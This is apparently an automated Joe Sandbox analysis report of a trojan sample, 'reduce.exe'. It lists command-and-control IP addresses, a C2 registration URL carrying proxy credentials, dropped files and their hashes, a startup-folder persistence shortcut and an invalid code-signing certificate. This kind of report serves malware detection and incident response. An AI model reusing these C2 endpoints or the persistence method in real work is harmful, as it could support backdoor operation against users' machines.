    C:\Users\user\AppData\Local\Temp\nfabo47%ReversingLabsWin32.Trojan.Ghostsocks
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://www.freepascal.org/0%Avira URL Cloudsafe
    http://188.130.206.2430%Avira URL Cloudsafe
    http://38.180.205.164http://46.8.232.1060%Avira URL Cloudsafe
    https://home.hccnet.nl/s.j.francke/colorcatcher/index.html0%Avira URL Cloudsafe
    http://38.180.205.164/0%Avira URL Cloudsafe
    https://www.lazarus-ide.org/0%Avira URL Cloudsafe
    http://38.180.205.1640%Avira URL Cloudsafe
    http://46.8.232.106P.0%Avira URL Cloudsafe
    http://ocsp.sectigo.com00%Avira URL Cloudsafe
    http://188.130.206.24338.180.205.164:80P&0%Avira URL Cloudsafe
    http://46.8.236.61P0%Avira URL Cloudsafe
    http://188.130.206.243/0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://46.8.232.106/false
      high
      http://38.180.205.164/false
      • Avira URL Cloud: safe
      unknown
      http://46.8.236.61/false
        high
        http://188.130.206.243/false
        • Avira URL Cloud: safe
        unknown
        http://91.212.166.91/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.freepascal.org/reduce.exefalse
          • Avira URL Cloud: safe
          unknown
          https://sectigo.com/CPS0reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yreduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://ocsp.sectigo.com0reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://38.180.205.164http://46.8.232.106msiexec.exe, 00000007.00000002.2956126032.000000000ED0C000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://46.8.232.106msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpfalse
                high
                https://home.hccnet.nl/s.j.francke/colorcatcher/index.htmlreduce.exefalse
                • Avira URL Cloud: safe
                unknown
                http://188.130.206.243msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.lazarus-ide.org/reduce.exefalse
                • Avira URL Cloud: safe
                unknown
                http://38.180.205.164msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.info-zip.org/reduce.exe, 00000000.00000002.1718553599.0000000009496000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2006666674.0000000004852000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953875021.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1991442213.000000000946E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214539573.0000000004AEB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216585430.0000000004BBE000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://188.130.206.24338.180.205.164:80P&msiexec.exe, 00000007.00000002.2956257148.000000000ED96000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://46.8.232.106P.msiexec.exe, 00000007.00000002.2955110668.000000000EC7C000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://46.8.236.61msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpfalse
                      high
                      http://46.8.236.61Pmsiexec.exe, 00000007.00000002.2955110668.000000000EC96000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/jbsolucoes/ucpreduce.exe, 00000000.00000002.1720577037.00000001010CC000.00000008.00000001.01000000.00000003.sdmp, reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000000.1958521441.00000001010CC000.00000008.00000001.01000000.0000000B.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://91.212.166.91msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          46.8.232.106
                          unknownRussian Federation
                          28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                          188.130.206.243
                          unknownRussian Federation
                          200509SVINT-ASNESfalse
                          185.121.233.152
                          unknownSpain
                          198432IPCORE-ASEStrue
                          91.212.166.91
                          unknownUnited Kingdom
                          35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                          38.180.205.164
                          unknownUnited States
                          174COGENT-174USfalse
                          46.8.236.61
                          unknownRussian Federation
                          28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1568776
                          Start date and time:2024-12-04 23:22:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 6s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:reduce.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@12/8@0/6
                          EGA Information:
                          • Successful, ratio: 66.7%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target msiexec.exe, PID 8024 because there are no executed function
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: reduce.exe
                          TimeTypeDescription
                          17:23:02API Interceptor1x Sleep call for process: reduce.exe modified
                          17:23:29API Interceptor1x Sleep call for process: Client32.exe modified
                          22:23:18AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client32.lnk
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          46.8.232.106InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou
                          Week11.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          188.130.206.243InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou
                          Week11.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          SVINT-ASNESInsertSr.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          • 188.130.200.151
                          iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          Week11.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                          • 188.130.206.243
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsInsertSr.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.236.61
                          iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.236.61
                          ppc.elfGet hashmaliciousMiraiBrowse
                          • 46.8.228.104
                          file.exeGet hashmaliciousCryptbotBrowse
                          • 46.8.237.112
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 46.8.237.112
                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                          • 46.8.237.112
                          Week11.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.236.61
                          Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.236.61
                          m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.236.61
                          https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106
                          MOBILY-ASEtihadEtisalatCompanyMobilySAteste.mips.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                          • 86.51.206.7
                          la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                          • 176.224.118.112
                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          • 37.43.193.195
                          sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          • 37.243.106.195
                          botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                          • 176.16.239.106
                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                          • 176.16.239.121
                          x86_64.elfGet hashmaliciousMiraiBrowse
                          • 37.127.151.127
                          loligang.spc.elfGet hashmaliciousMiraiBrowse
                          • 46.240.95.184
                          loligang.x86.elfGet hashmaliciousMiraiBrowse
                          • 37.124.22.117
                          InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                          • 91.212.166.91
                          IPCORE-ASESm0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 185.121.233.152
                          Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                          • 185.18.198.253
                          Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                          • 185.18.198.253
                          SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.18.198.253
                          n1KVzXM8Wk.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.18.198.253
                          PO #1131011152-2024-Order,pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.18.198.253
                          SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.18.198.253
                          Scan 20.02.24.pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.18.198.253
                          https://facturamecr.com/Citrix-Sharefile-Portal/index.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 5.2.88.91
                          PROFORMA INVOICE.docGet hashmaliciousUnknownBrowse
                          • 5.2.91.169
                          No context
                          No context
                          Process:C:\Users\user\Desktop\reduce.exe
                          File Type:PNG image data, 2992 x 2913, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):7299666
                          Entropy (8bit):7.997731766327472
                          Encrypted:true
                          SSDEEP:196608:HxEa9y3BUh6ia+s3RtmMjVA+KPDibr5u5FC:HxEp3yQtx3pZA+K+bATC
                          MD5:3B8A3AAC7469ECC5FA531D9B86C2DFD9
                          SHA1:1FBC633341E3B4F5E269C044B9B99ABE2D2723DB
                          SHA-256:64F0992F6070AA9C459E59B6CD1523D2CD98AF29941501FFA262F9DF412371A3
                          SHA-512:6B234FC6B2D39B8FE53354D0DB2713AE2E4DE4C4D12FCE81FDFE326A9063B3415EAD9C8831FCFBCC4490E99155FC35DAF48069F3C781E57465D867EE6F257976
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR.......a......o=.. .IDATx..;..G.%.....>gW...].@yH..$.....).....5..Ur..2..u.52.n.E...........33~.......33.....H.].'?H.p..q............}./ ..`.....6.c...../.~.|k...K.oq..i...G.&...i..\J......3.....?.....Z...B.....sn.N^..........G.."w.R....x..,.....ws).5......*+. B.\.rw..>HY...]..../...J..ntM.$c...%...uU.e..f.../cY.~$ `......x..f..ip.yvh....!.Zk.1...8..)....O.....`.....i].w..3..q...W....I....p..h...Z.....f%.1>.4...lA.........@.%.c.0..~...a..&..1.....c....{....7....|.8g..d....]...+...n......;...ZJ)|......,.....ks{..P..p.]....T.K1.R..i...... ..I.AB...,._.....'.0p...._....:....|....hj...k..G..x)...a...?..0.p;[7.A...q....>...m.b.cj...p7..W.H..%..O..G..W..e7bxH>h..J1..tY.j!.1*..........V..W.j....u....g...$..w..J|.$...v..cx``.|..GfN..%.>K..|.mK@K...N....=H.T.1>..K%qM&.|p.|....d|.p.|)....U.gw...Lk]m;G...^"....._.].8_.....-.T./.J|....}H...0N..\...........og....t.\=,...........{X...>...EQ....|F...L8RI...3F...K-$;O.. .ij..... .....
                          Process:C:\Users\user\Desktop\reduce.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):8279157
                          Entropy (8bit):7.947192595777569
                          Encrypted:false
                          SSDEEP:196608:sSSpNEjbjo/qtkPUomsEeUrB7LcBK89onqTOik59DfF:NSQbqtE9K3a4O3
                          MD5:B923BC8C4D6C694F3EAC3F305EC48327
                          SHA1:21FB514F86507C80370D49861FCAE8A9D8D72E5E
                          SHA-256:3BCC2B09B395CD92B98853E6578268EA569B4B2B6FB32EF534C316F1081FA291
                          SHA-512:736AEEAA4448576A80892A8812D782B3E94F38D6643FF2972AF04C6278AA5AEC2DD4747CFF256097DFAB87AA913179F0CCA79FD4CCB89BB7548A12B935643A96
                          Malicious:false
                          Preview:X...Z...[...[...Z.......[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...~.......~..8.4...4......./...5...).:...../...[...[...[...[...[...[...[...[...[...[...[.....2...7.....[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[.....>...:.[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...~........).=.....).,.[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...-...u...i...[...[...[...[...[...[...[...[...[...[...
                          Process:C:\Users\user\AppData\Roaming\jion\Client32.exe
                          File Type:PNG image data, 2992 x 2913, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):7299666
                          Entropy (8bit):7.997731766327472
                          Encrypted:true
                          SSDEEP:196608:HxEa9y3BUh6ia+s3RtmMjVA+KPDibr5u5FC:HxEp3yQtx3pZA+K+bATC
                          MD5:3B8A3AAC7469ECC5FA531D9B86C2DFD9
                          SHA1:1FBC633341E3B4F5E269C044B9B99ABE2D2723DB
                          SHA-256:64F0992F6070AA9C459E59B6CD1523D2CD98AF29941501FFA262F9DF412371A3
                          SHA-512:6B234FC6B2D39B8FE53354D0DB2713AE2E4DE4C4D12FCE81FDFE326A9063B3415EAD9C8831FCFBCC4490E99155FC35DAF48069F3C781E57465D867EE6F257976
                          Malicious:false
                          Preview:.PNG........IHDR.......a......o=.. .IDATx..;..G.%.....>gW...].@yH..$.....).....5..Ur..2..u.52.n.E...........33~.......33.....H.].'?H.p..q............}./ ..`.....6.c...../.~.|k...K.oq..i...G.&...i..\J......3.....?.....Z...B.....sn.N^..........G.."w.R....x..,.....ws).5......*+. B.\.rw..>HY...]..../...J..ntM.$c...%...uU.e..f.../cY.~$ `......x..f..ip.yvh....!.Zk.1...8..)....O.....`.....i].w..3..q...W....I....p..h...Z.....f%.1>.4...lA.........@.%.c.0..~...a..&..1.....c....{....7....|.8g..d....]...+...n......;...ZJ)|......,.....ks{..P..p.]....T.K1.R..i...... ..I.AB...,._.....'.0p...._....:....|....hj...k..G..x)...a...?..0.p;[7.A...q....>...m.b.cj...p7..W.H..%..O..G..W..e7bxH>h..J1..tY.j!.1*..........V..W.j....u....g...$..w..J|.$...v..cx``.|..GfN..%.>K..|.mK@K...N....=H.T.1>..K%qM&.|p.|....d|.p.|)....U.gw...Lk]m;G...^"....._.].8_.....-.T./.J|....}H...0N..\...........og....t.\=,...........{X...>...EQ....|F...L8RI...3F...K-$;O.. .ij..... .....
                          Process:C:\Users\user\AppData\Roaming\jion\Client32.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):8279157
                          Entropy (8bit):7.947195576132262
                          Encrypted:false
                          SSDEEP:196608:USSpNEjbjo/qtkPUomsEeUrB7LcBK89onqTOik59DfF:lSQbqtE9K3a4O3
                          MD5:676FEE4F51C524DD11AD26B09C8381AF
                          SHA1:82FC9BC85188C02D81CB6AB1470B52C20447B75E
                          SHA-256:B087711B7E19BC2B710E97DF9EC4F113DAC5CFBABD535F7B1D2F11FB3049591A
                          SHA-512:BD5DB03565243BD734F2961F36A79021E0B3BB2FF2DA7A10DB99B3088CB17DFE11B3218B37439F2E89DE366E04F9C8C257418B9EFBAEA27D42B8124ED24F6E25
                          Malicious:false
                          Preview:X...Z...[...[...Z.......[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...~.......~..8.4...4......./...5...).:...../...[...[...[...[...[...[...[...[...[...[...[.....2...7.....[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[.....>...:.[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...~........).=.....).,.[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...-...u...i...[...[...[...[...[...[...[...[...[...[...
                          Process:C:\Windows\SysWOW64\more.com
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Oct 4 11:02:29 2023, mtime=Wed Dec 4 21:23:01 2024, atime=Wed Dec 4 21:22:58 2024, length=18233144, window=hide
                          Category:dropped
                          Size (bytes):862
                          Entropy (8bit):5.0509286712090695
                          Encrypted:false
                          SSDEEP:24:8mOdpk+gOWWoKPhBlDyA7w3RUBOhlpFbBm:8mk0RWvl9k3flpv
                          MD5:843FE8A25DEDFE87D3FB6F41F6CFE072
                          SHA1:87C7FD8643C90572FCE17CE5F27A1BBBE12F3B61
                          SHA-256:8B3EFC3787E1BA99CCF2CCD66D332B59AF6808E73FB1ABDA3735C261F25CA37D
                          SHA-512:D2145F7D6F6478A8D6D36F21A863659019102B2935D69C46D1E92ED1160F8B9F01DAB7A75199564E5C628087BF5532844AE2B553DC171B89DCAC9B08BD017D11
                          Malicious:false
                          Preview:L..................F.... .....X.....Hgq..F......F..87........................:..DG..Yr?.D..U..k0.&...&......vk.v...... ..F...`...F......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y............................%..A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......CW.^.Y...........................Iu..R.o.a.m.i.n.g.....N.1......Y...jion..:......Y.Y...........................f.^.j.i.o.n.....f.2.87...Y. .Client32.exe..J......DWO`.Y...........................F...C.l.i.e.n.t.3.2...e.x.e......._...............-.......^....................C:\Users\user\AppData\Roaming\jion\Client32.exe........\.....\.R.o.a.m.i.n.g.\.j.i.o.n.\.C.l.i.e.n.t.3.2...e.x.e.`.......X.......494126...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                          Process:C:\Windows\SysWOW64\more.com
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):7547904
                          Entropy (8bit):6.177118093553273
                          Encrypted:false
                          SSDEEP:98304:R7TGVb21psfEKGulAEGviPnj7ipFq6LsP5F973Ewh:NTpsfkFq6k5F973n
                          MD5:DBEB491070512C238525522FD6DC7714
                          SHA1:C62B9436849563A14422C5A2C9DEFA5FFE104B06
                          SHA-256:CD8BA142563CC184BD42F47AD3F29AF756C2F5789DC9BF1AF91003C3021F3D79
                          SHA-512:906FC643D13AAF21B8D3A929D028D2C89B8B21B5253C6C22DA134B700ED62C5F3DF96A75ED9DB9AF61B95C281C7C954C07FA846346042D9A2A2BD263FCCB703C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 47%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...oi.U..s..............0F...................m...@...........................v...........@...................................s.^.............................t.n...................................................@.m..............................text.....F......0F................. ..`.rdata....'..@F...'..4F.............@..@.data...".....m.......m.............@....idata..^.....s......|p.............@....reloc..n.....t.......p.............@..B.symtab.......v.......s................Bfwjua.... ....v.......s.............@...........................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\more.com
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):7547904
                          Entropy (8bit):6.177118093553273
                          Encrypted:false
                          SSDEEP:98304:R7TGVb21psfEKGulAEGviPnj7ipFq6LsP5F973Ewh:NTpsfkFq6k5F973n
                          MD5:DBEB491070512C238525522FD6DC7714
                          SHA1:C62B9436849563A14422C5A2C9DEFA5FFE104B06
                          SHA-256:CD8BA142563CC184BD42F47AD3F29AF756C2F5789DC9BF1AF91003C3021F3D79
                          SHA-512:906FC643D13AAF21B8D3A929D028D2C89B8B21B5253C6C22DA134B700ED62C5F3DF96A75ED9DB9AF61B95C281C7C954C07FA846346042D9A2A2BD263FCCB703C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 47%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...oi.U..s..............0F...................m...@...........................v...........@...................................s.^.............................t.n...................................................@.m..............................text.....F......0F................. ..`.rdata....'..@F...'..4F.............@..@.data...".....m.......m.............@....idata..^.....s......|p.............@....reloc..n.....t.......p.............@..B.symtab.......v.......s................Bfwjua.... ....v.......s.............@...........................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\msiexec.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):248
                          Entropy (8bit):6.119542041160086
                          Encrypted:false
                          SSDEEP:6:e8bfQDOwfVQq7z1ylE2xkuRq5wmhss71pTdE/P6KmIlW3n:HgfVQq7z0C2xkh6m2s71tKmIlCn
                          MD5:3E9248408B029C4D008F1F4012241730
                          SHA1:B93CBD96EA92D09C60E154DBFBA61AAA4D5562C8
                          SHA-256:D4105E0F7FD6533F3FFAE42949F62B025437BA08F23E8943ED9A696E18F2895E
                          SHA-512:A24472A16E2B27A50381A93656A95E64BCF37D17E31E09F53362CA8569845A4C26BB8FDE64B7E532A947D0D7371304D3696FABF0F785D0F0C0481491509BDD51
                          Malicious:false
                          Preview:.\........$..Y.RS..>AS.+L.7UP6.._$%QM._.[>.9_. .Q..$GU.._.</U7<._=.'@6..Z...X..WB Y...#-.S.&..8V.>$.S3!(A(..L5Y.Z.5.VUZ)M.Z$X.,(V PPS.)1G5'.\VZSS.;.\.3.@(^$R..1_?4.Z7.WO[4.. 3..+>.......).T...L.^.F_..W5%.R<..G>."\*_-R.%.[VV.@...RY4?_S5.X.:.M7.VP%*.
                          File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                          Entropy (8bit):7.084738149143265
                          TrID:
                          • Win64 Executable (generic) (12005/4) 74.95%
                          • Generic Win/DOS Executable (2004/3) 12.51%
                          • DOS Executable Generic (2002/1) 12.50%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                          File name:reduce.exe
                          File size:18'233'144 bytes
                          MD5:b0f4c61f99716127097da80d07ed6123
                          SHA1:310e490a366e2d55b27417f545e4abd575fad0a3
                          SHA256:fdb10dd37d214b1e9e4258e601a6b3d7a3d9615513b3e0afaad8d9cc09481087
                          SHA512:4bd2bbe23689d636a4725a015d5f685057bbad1dbddc9cf038c632c182b7e39241648b86ed3f0d17c04cbe1bc3bbe1ccf28f2ab532f96ed089c3545315686d9d
                          SSDEEP:196608:Izx+2j3JYwC+dbhxEa9y3BUh6ia+s3RtmMjVA+KPDibr5u5FOW2R:Izx+eYsbhxEp3yQtx3pZA+K+bATOWu
                          TLSH:E3078EFBB5228B94C0CEC5B4249797EA9F21BC2C04B6138261DA271F9F76C805D598DF
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./......H^.$Zw.X....0.......................................@.............................................
                          Icon Hash:edeaa6a6e66a4202
                          Entrypoint:0x1000030a0
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x100000000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                          DLL Characteristics:
                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                          TLS Callbacks:0x3010, 0x1
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:61876e4043b7e6c5a61a84484ce47785
                          Signature Valid:false
                          Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 23/02/2023 19:00:00 23/05/2026 19:59:59
                          Subject Chain
                          • CN=Alexandre Kozlov, O=Alexandre Kozlov, S=Alberta, C=CA
                          Version:3
                          Thumbprint MD5:318527605F09093E89D869D57482C65A
